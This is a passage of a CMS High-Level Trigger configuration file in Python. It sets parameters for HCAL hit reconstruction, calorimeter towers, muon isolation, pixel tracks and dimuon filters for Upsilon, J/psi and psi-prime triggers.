cms.PSet( \n slopeMax = cms.double( -0.6 ),\n r1Max = cms.double( 1.0 ),\n r1Min = cms.double( 0.15 ),\n TimingEnergyThreshold = cms.double( 30.0 ),\n slopeMin = cms.double( -1.5 ),\n outerMin = cms.double( 0.0 ),\n outerMax = cms.double( 0.1 ),\n fracLeaderMin = cms.double( 0.4 ),\n r2Min = cms.double( 0.1 ),\n r2Max = cms.double( 0.5 ),\n fracLeaderMax = cms.double( 0.7 )\n ),\n pulseShapeParameters = cms.PSet( ),\n hfTimingTrustParameters = cms.PSet( \n hfTimingTrustLevel2 = cms.int32( 4 ),\n hfTimingTrustLevel1 = cms.int32( 1 )\n ),\n firstAuxOffset = cms.int32( 0 )\n)\nhltHoreco = cms.EDProducer( \"HcalHitReconstructor\",\n correctForTimeslew = cms.bool( True ),\n correctForPhaseContainment = cms.bool( True ),\n correctionPhaseNS = cms.double( 13.0 ),\n digiLabel = cms.InputTag( \"hltHcalDigis\" ),\n correctTiming = cms.bool( False ),\n setNoiseFlags = cms.bool( False ),\n setHSCPFlags = cms.bool( False ),\n setSaturationFlags = cms.bool( False ),\n setTimingTrustFlags = cms.bool( False ),\n setPulseShapeFlags = cms.bool( False ),\n dropZSmarkedPassed = cms.bool( True ),\n firstAuxTS = cms.int32( 4 ),\n firstSample = cms.int32( 4 ),\n samplesToAdd = cms.int32( 4 ),\n tsFromDB = cms.bool( True ),\n useLeakCorrection = cms.bool( False ),\n Subdetector = cms.string( \"HO\" ),\n setTimingShapedCutsFlags = cms.bool( False ),\n digistat = cms.PSet( ),\n HFInWindowStat = cms.PSet( ),\n S9S1stat = cms.PSet( \n longETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n HcalAcceptSeverityLevel = cms.int32( 9 ),\n shortEnergyParams = cms.vdouble( 35.1773, 35.37, 35.7933, 36.4472, 37.3317, 38.4468, 39.7925, 41.3688, 43.1757, 45.2132, 47.4813, 49.98, 52.7093 ),\n flagsToSkip = cms.int32( 24 ),\n shortETParams = cms.vdouble( 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n short_optimumSlope = cms.vdouble( -99999.0, 0.0164905, 0.0238698, 0.0321383, 0.041296, 0.0513428, 0.0622789, 0.0741041, 0.0868186, 0.100422, 0.135313, 0.136289, 0.0589927 ),\n longEnergyParams = cms.vdouble( 43.5, 45.7, 48.32, 51.36, 54.82, 58.7, 63.0, 67.72, 72.86, 78.42, 84.4, 90.8, 97.62 ),\n long_optimumSlope = cms.vdouble( -99999.0, 0.0164905, 0.0238698, 0.0321383, 0.041296, 0.0513428, 0.0622789, 0.0741041, 0.0868186, 0.100422, 0.135313, 0.136289, 0.0589927 ),\n isS8S1 = cms.bool( False )\n ),\n S8S1stat = cms.PSet( \n longETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n HcalAcceptSeverityLevel = cms.int32( 9 ),\n shortEnergyParams = cms.vdouble( 40.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0 ),\n flagsToSkip = cms.int32( 16 ),\n shortETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n short_optimumSlope = cms.vdouble( 0.3, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1 ),\n longEnergyParams = cms.vdouble( 40.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0 ),\n long_optimumSlope = cms.vdouble( 0.3, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1 ),\n isS8S1 = cms.bool( True )\n ),\n PETstat = cms.PSet( \n longETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n short_R_29 = cms.vdouble( 0.8 ),\n HcalAcceptSeverityLevel = cms.int32( 9 ),\n shortEnergyParams = cms.vdouble( 35.1773, 35.37, 35.7933, 36.4472, 37.3317, 38.4468, 39.7925, 41.3688, 43.1757, 45.2132, 47.4813, 49.98, 52.7093 ),\n flagsToSkip = cms.int32( 0 ),\n long_R_29 = cms.vdouble( 0.8 ),\n shortETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n short_R = cms.vdouble( 0.8 ),\n longEnergyParams = cms.vdouble( 43.5, 45.7, 48.32, 51.36, 54.82, 58.7, 63.0, 67.72, 72.86, 78.42, 84.4, 90.8, 97.62 ),\n long_R = cms.vdouble( 0.98 )\n ),\n saturationParameters = cms.PSet( maxADCvalue = cms.int32( 127 ) ),\n timingshapedcutsParameters = cms.PSet( \n ignorelowest = cms.bool( True ),\n win_offset = cms.double( 0.0 ),\n ignorehighest = cms.bool( False ),\n win_gain = cms.double( 1.0 ),\n tfilterEnvelope = cms.vdouble( 4.0, 12.04, 13.0, 10.56, 23.5, 8.82, 37.0, 7.38, 56.0, 6.3, 81.0, 5.64, 114.5, 5.44, 175.5, 5.38, 350.5, 5.14 )\n ),\n flagParameters = cms.PSet( \n nominalPedestal = cms.double( 3.0 ),\n hitMultiplicityThreshold = cms.int32( 17 ),\n hitEnergyMinimum = cms.double( 1.0 ),\n pulseShapeParameterSets = cms.VPSet( \n cms.PSet( pulseShapeParameters = cms.vdouble( 0.0, 100.0, -50.0, 0.0, -15.0, 0.15 ) ),\n cms.PSet( pulseShapeParameters = cms.vdouble( 100.0, 2000.0, -50.0, 0.0, -5.0, 0.05 ) ),\n cms.PSet( pulseShapeParameters = cms.vdouble( 2000.0, 1000000.0, -50.0, 0.0, 95.0, 0.0 ) ),\n cms.PSet( pulseShapeParameters = cms.vdouble( -1000000.0, 1000000.0, 45.0, 0.1, 1000000.0, 0.0 ) )\n )\n ),\n hscpParameters = cms.PSet( \n slopeMax = cms.double( -0.6 ),\n r1Max = cms.double( 1.0 ),\n r1Min = cms.double( 0.15 ),\n TimingEnergyThreshold = cms.double( 30.0 ),\n slopeMin = cms.double( -1.5 ),\n outerMin = cms.double( 0.0 ),\n outerMax = cms.double( 0.1 ),\n fracLeaderMin = cms.double( 0.4 ),\n r2Min = cms.double( 0.1 ),\n r2Max = cms.double( 0.5 ),\n fracLeaderMax = cms.double( 0.7 )\n ),\n pulseShapeParameters = cms.PSet( ),\n hfTimingTrustParameters = cms.PSet( \n hfTimingTrustLevel2 = cms.int32( 4 ),\n 
hfTimingTrustLevel1 = cms.int32( 1 )\n ),\n firstAuxOffset = cms.int32( 0 )\n)\nhltTowerMakerForMuons = cms.EDProducer( \"CaloTowersCreator\",\n EBThreshold = cms.double( 0.07 ),\n EEThreshold = cms.double( 0.3 ),\n UseEtEBTreshold = cms.bool( False ),\n UseEtEETreshold = cms.bool( False ),\n UseSymEBTreshold = cms.bool( False ),\n UseSymEETreshold = cms.bool( False ),\n HcalThreshold = cms.double( -1000.0 ),\n HBThreshold = cms.double( 0.7 ),\n HESThreshold = cms.double( 0.8 ),\n HEDThreshold = cms.double( 0.8 ),\n HOThreshold0 = cms.double( 3.5 ),\n HOThresholdPlus1 = cms.double( 3.5 ),\n HOThresholdMinus1 = cms.double( 3.5 ),\n HOThresholdPlus2 = cms.double( 3.5 ),\n HOThresholdMinus2 = cms.double( 3.5 ),\n HF1Threshold = cms.double( 0.5 ),\n HF2Threshold = cms.double( 0.85 ),\n EBWeight = cms.double( 1.0 ),\n EEWeight = cms.double( 1.0 ),\n HBWeight = cms.double( 1.0 ),\n HESWeight = cms.double( 1.0 ),\n HEDWeight = cms.double( 1.0 ),\n HOWeight = cms.double( 1.0E-99 ),\n HF1Weight = cms.double( 1.0 ),\n HF2Weight = cms.double( 1.0 ),\n EcutTower = cms.double( -1000.0 ),\n EBSumThreshold = cms.double( 0.2 ),\n EESumThreshold = cms.double( 0.45 ),\n UseHO = cms.bool( False ),\n MomConstrMethod = cms.int32( 1 ),\n MomHBDepth = cms.double( 0.2 ),\n MomHEDepth = cms.double( 0.4 ),\n MomEBDepth = cms.double( 0.3 ),\n MomEEDepth = cms.double( 0.0 ),\n hbheInput = cms.InputTag( \"hltHbhereco\" ),\n hoInput = cms.InputTag( \"hltHoreco\" ),\n hfInput = cms.InputTag( \"hltHfreco\" ),\n AllowMissingInputs = cms.bool( False ),\n HcalAcceptSeverityLevel = cms.uint32( 9 ),\n EcalAcceptSeverityLevel = cms.uint32( 3 ),\n UseHcalRecoveredHits = cms.bool( False ),\n UseEcalRecoveredHits = cms.bool( False ),\n UseRejectedHitsOnly = cms.bool( False ),\n HcalAcceptSeverityLevelForRejectedHit = cms.uint32( 9999 ),\n EcalAcceptSeverityLevelForRejectedHit = cms.uint32( 9999 ),\n UseRejectedRecoveredHcalHits = cms.bool( False ),\n UseRejectedRecoveredEcalHits = cms.bool( False ),\n EBGrid = cms.vdouble( ),\n EBWeights = cms.vdouble( ),\n EEGrid = cms.vdouble( ),\n EEWeights = cms.vdouble( ),\n HBGrid = cms.vdouble( ),\n HBWeights = cms.vdouble( ),\n HESGrid = cms.vdouble( ),\n HESWeights = cms.vdouble( ),\n HEDGrid = cms.vdouble( ),\n HEDWeights = cms.vdouble( ),\n HOGrid = cms.vdouble( ),\n HOWeights = cms.vdouble( ),\n HF1Grid = cms.vdouble( ),\n HF1Weights = cms.vdouble( ),\n HF2Grid = cms.vdouble( ),\n HF2Weights = cms.vdouble( ),\n ecalInputs = cms.VInputTag( 'hltEcalRegionalMuonsRecHit:EcalRecHitsEB','hltEcalRegionalMuonsRecHit:EcalRecHitsEE' )\n)\nhltL2MuonIsolations = cms.EDProducer( \"L2MuonIsolationProducer\",\n StandAloneCollectionLabel = cms.InputTag( 'hltL2Muons','UpdatedAtVtx' ),\n ExtractorPSet = cms.PSet( \n DR_Veto_H = cms.double( 0.1 ),\n Vertex_Constraint_Z = cms.bool( False ),\n Threshold_H = cms.double( 0.5 ),\n ComponentName = cms.string( \"CaloExtractor\" ),\n Threshold_E = cms.double( 0.2 ),\n DR_Max = cms.double( 0.24 ),\n DR_Veto_E = cms.double( 0.07 ),\n Weight_E = cms.double( 1.5 ),\n Vertex_Constraint_XY = cms.bool( False ),\n DepositLabel = cms.untracked.string( \"EcalPlusHcal\" ),\n CaloTowerCollectionLabel = cms.InputTag( \"hltTowerMakerForMuons\" ),\n Weight_H = cms.double( 1.0 )\n ),\n IsolatorPSet = cms.PSet( \n ConeSizes = cms.vdouble( 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24 ),\n ComponentName = cms.string( \"SimpleCutsIsolator\" ),\n EtaBounds = cms.vdouble( 
0.0435, 0.1305, 0.2175, 0.3045, 0.3915, 0.4785, 0.5655, 0.6525, 0.7395, 0.8265, 0.9135, 1.0005, 1.0875, 1.1745, 1.2615, 1.3485, 1.4355, 1.5225, 1.6095, 1.6965, 1.785, 1.88, 1.9865, 2.1075, 2.247, 2.411 ),\n Thresholds = cms.vdouble( 4.0, 3.7, 4.0, 3.5, 3.4, 3.4, 3.2, 3.4, 3.1, 2.9, 2.9, 2.7, 3.1, 3.0, 2.4, 2.1, 2.0, 2.3, 2.2, 2.4, 2.5, 2.5, 2.6, 2.9, 3.1, 2.9 )\n )\n)\nhltDiMuon6IsoMuL2Filtered0 = cms.EDFilter( \"HLTMuonIsoFilter\",\n CandTag = cms.InputTag( \"hltL2MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltL2DiMuon6L2PreFiltered0\" ),\n MinN = cms.int32( 2 ),\n saveTags = cms.bool( True ),\n DepTag = cms.VInputTag( 'hltL2MuonIsolations' ),\n IsolatorPSet = cms.PSet( )\n)\nhltDiMuon6LowMassFiltered6 = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOfflineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltL2DiMuon6L2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 6.0 ),\n MinPtMax = cms.double( 4.0 ),\n MinPtMin = cms.double( 4.0 ),\n MinInvMass = cms.double( 5.0 ),\n MaxInvMass = cms.double( 14.5 ),\n MinAcop = cms.double( -9999.0 ),\n MaxAcop = cms.double( 9999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 999999.0 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( False )\n)\nhltPixelTracks = cms.EDProducer( \"PixelTrackProducer\",\n useFilterWithES = cms.bool( False ),\n RegionFactoryPSet = cms.PSet( \n ComponentName = cms.string( \"GlobalRegionProducerFromBeamSpot\" ),\n RegionPSet = cms.PSet( \n precise = cms.bool( True ),\n ptMin = cms.double( 0.9 ),\n originRadius = cms.double( 0.2 ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" ),\n originHalfLength = cms.double( 24.0 )\n )\n ),\n OrderedHitsFactoryPSet = cms.PSet( \n ComponentName = cms.string( \"StandardHitTripletGenerator\" ),\n SeedingLayers = cms.string( \"hltESPPixelLayerTriplets\" ),\n GeneratorPSet = cms.PSet( \n useBending = cms.bool( True ),\n useFixedPreFiltering = cms.bool( False ),\n maxElement = cms.uint32( 100000 ),\n phiPreFiltering = cms.double( 0.3 ),\n extraHitRPhitolerance = cms.double( 0.06 ),\n useMultScattering = cms.bool( True ),\n ComponentName = cms.string( \"PixelTripletHLTGenerator\" ),\n extraHitRZtolerance = cms.double( 0.06 ),\n SeedComparitorPSet = cms.PSet( ComponentName = cms.string( \"none\" ) )\n )\n ),\n FitterPSet = cms.PSet( \n ComponentName = cms.string( \"PixelFitterByHelixProjections\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n fixImpactParameter = cms.double( 0.0 )\n ),\n FilterPSet = cms.PSet( \n chi2 = cms.double( 1000.0 ),\n nSigmaTipMaxTolerance = cms.double( 0.0 ),\n ComponentName = cms.string( \"PixelTrackFilterByKinematics\" ),\n nSigmaInvPtTolerance = cms.double( 0.0 ),\n ptMin = cms.double( 0.1 ),\n tipMax = cms.double( 1.0 )\n ),\n CleanerPSet = cms.PSet( ComponentName = cms.string( \"PixelTrackCleanerBySharedHits\" ) )\n)\nhltL3MuonIsolations = cms.EDProducer( \"L3MuonIsolationProducer\",\n inputMuonCollection = cms.InputTag( \"hltL3Muons\" ),\n OutputMuIsoDeposits = cms.bool( True ),\n TrackPt_Min = cms.double( -1.0 ),\n CutsPSet = cms.PSet( \n ConeSizes = cms.vdouble( 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 
0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24, 0.24 ),\n ComponentName = cms.string( \"SimpleCuts\" ),\n Thresholds = cms.vdouble( 1.1, 1.1, 1.1, 1.1, 1.2, 1.1, 1.2, 1.1, 1.2, 1.0, 1.1, 1.0, 1.0, 1.1, 1.0, 1.0, 1.1, 0.9, 1.1, 0.9, 1.1, 1.0, 1.0, 0.9, 0.8, 0.1 ),\n maxNTracks = cms.int32( -1 ),\n EtaBounds = cms.vdouble( 0.0435, 0.1305, 0.2175, 0.3045, 0.3915, 0.4785, 0.5655, 0.6525, 0.7395, 0.8265, 0.9135, 1.0005, 1.0875, 1.1745, 1.2615, 1.3485, 1.4355, 1.5225, 1.6095, 1.6965, 1.785, 1.88, 1.9865, 2.1075, 2.247, 2.411 ),\n applyCutsORmaxNTracks = cms.bool( False )\n ),\n ExtractorPSet = cms.PSet( \n Chi2Prob_Min = cms.double( -1.0 ),\n Diff_z = cms.double( 0.2 ),\n inputTrackCollection = cms.InputTag( \"hltPixelTracks\" ),\n ReferenceRadius = cms.double( 6.0 ),\n BeamSpotLabel = cms.InputTag( \"hltOnlineBeamSpot\" ),\n ComponentName = cms.string( \"PixelTrackExtractor\" ),\n DR_Max = cms.double( 0.24 ),\n Diff_r = cms.double( 0.1 ),\n VetoLeadingTrack = cms.bool( True ),\n DR_VetoPt = cms.double( 0.025 ),\n DR_Veto = cms.double( 0.01 ),\n NHits_Min = cms.uint32( 0 ),\n Chi2Ndof_Max = cms.double( 1.0E64 ),\n Pt_Min = cms.double( -1.0 ),\n DepositLabel = cms.untracked.string( \"PXLS\" ),\n BeamlineOption = cms.string( \"BeamSpotFromEvent\" ),\n PropagateTracksToRadius = cms.bool( True ),\n PtVeto_Min = cms.double( 2.0 )\n )\n)\nhltDiMuon6IsoMuL3Filtered6 = cms.EDFilter( \"HLTMuonIsoFilter\",\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDiMuon6LowMassFiltered6\" ),\n MinN = cms.int32( 2 ),\n saveTags = cms.bool( True ),\n DepTag = cms.VInputTag( 'hltL3MuonIsolations' ),\n IsolatorPSet = cms.PSet( )\n)\nhltDisplacedmumuVtxProducerDiMuon6LowMass = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDiMuon6IsoMuL3Filtered6\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 4.0 ),\n MinPtPair = cms.double( 6.0 ),\n MinInvMass = cms.double( 5.0 ),\n MaxInvMass = cms.double( 14.5 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltVertexmumuFilterDiMuon6LowMass = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( False ),\n MinLxySignificance = cms.double( 0.0 ),\n MaxLxySignificance = cms.double( 3.0 ),\n MaxNormalisedChi2 = cms.double( 5.0 ),\n MinVtxProbability = cms.double( 0.0 ),\n MinCosinePointingAngle = cms.double( -2.0 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerDiMuon6LowMass\" ),\n BeamSpotTag = cms.InputTag( \"hltOfflineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreDimuon7UpsilonBarrel = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltBarrelDimuon7UpsilonL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 6.9 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 0.0 ),\n MinInvMass = cms.double( 8.5 ),\n MaxInvMass = cms.double( 11.5 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 
999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 1.25 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( True )\n)\nhltDisplacedmumuVtxProducerDimuon7UpsilonBarrel = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltBarrelDimuon7UpsilonL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltVertexmumuFilterDimuon7UpsilonBarrel = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 0.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.0050 ),\n MinCosinePointingAngle = cms.double( -2.0 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerDimuon7UpsilonBarrel\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreDimuon9UpsilonBarrel = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltDimuon9BarrelUpsilonL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 8.9 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 0.0 ),\n MinInvMass = cms.double( 8.5 ),\n MaxInvMass = cms.double( 11.5 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 1.25 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( True )\n)\nhltDisplacedmumuVtxProducerDimuon9UpsilonBarrel = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuon9BarrelUpsilonL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltVertexmumuFilterDimuon9UpsilonBarrel = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 0.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.0050 ),\n MinCosinePointingAngle = cms.double( -2.0 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerDimuon9UpsilonBarrel\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreDimuon9PsiPrime = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltDimuon9PsiPrimeL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( 
\"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 8.9 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 0.0 ),\n MinInvMass = cms.double( 3.35 ),\n MaxInvMass = cms.double( 4.05 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 2.5 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( True )\n)\nhltDisplacedmumuVtxProducerDimuon9PsiPrime = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuon9PsiPrimeL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltVertexmumuFilterDimuon9PsiPrime = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 0.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.0050 ),\n MinCosinePointingAngle = cms.double( -2.0 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerDimuon9PsiPrime\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreDimuon10JpsiBarrel = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltDimuon10BarrelJpsiL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 9.9 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 0.0 ),\n MinInvMass = cms.double( 2.8 ),\n MaxInvMass = cms.double( 3.35 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 1.25 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( True )\n)\nhltDisplacedmumuVtxProducerDimuon10JpsiBarrel = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuon10BarrelJpsiL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltVertexmumuFilterDimuon10JpsiBarrel = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 0.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.0050 ),\n MinCosinePointingAngle = cms.double( -2.0 
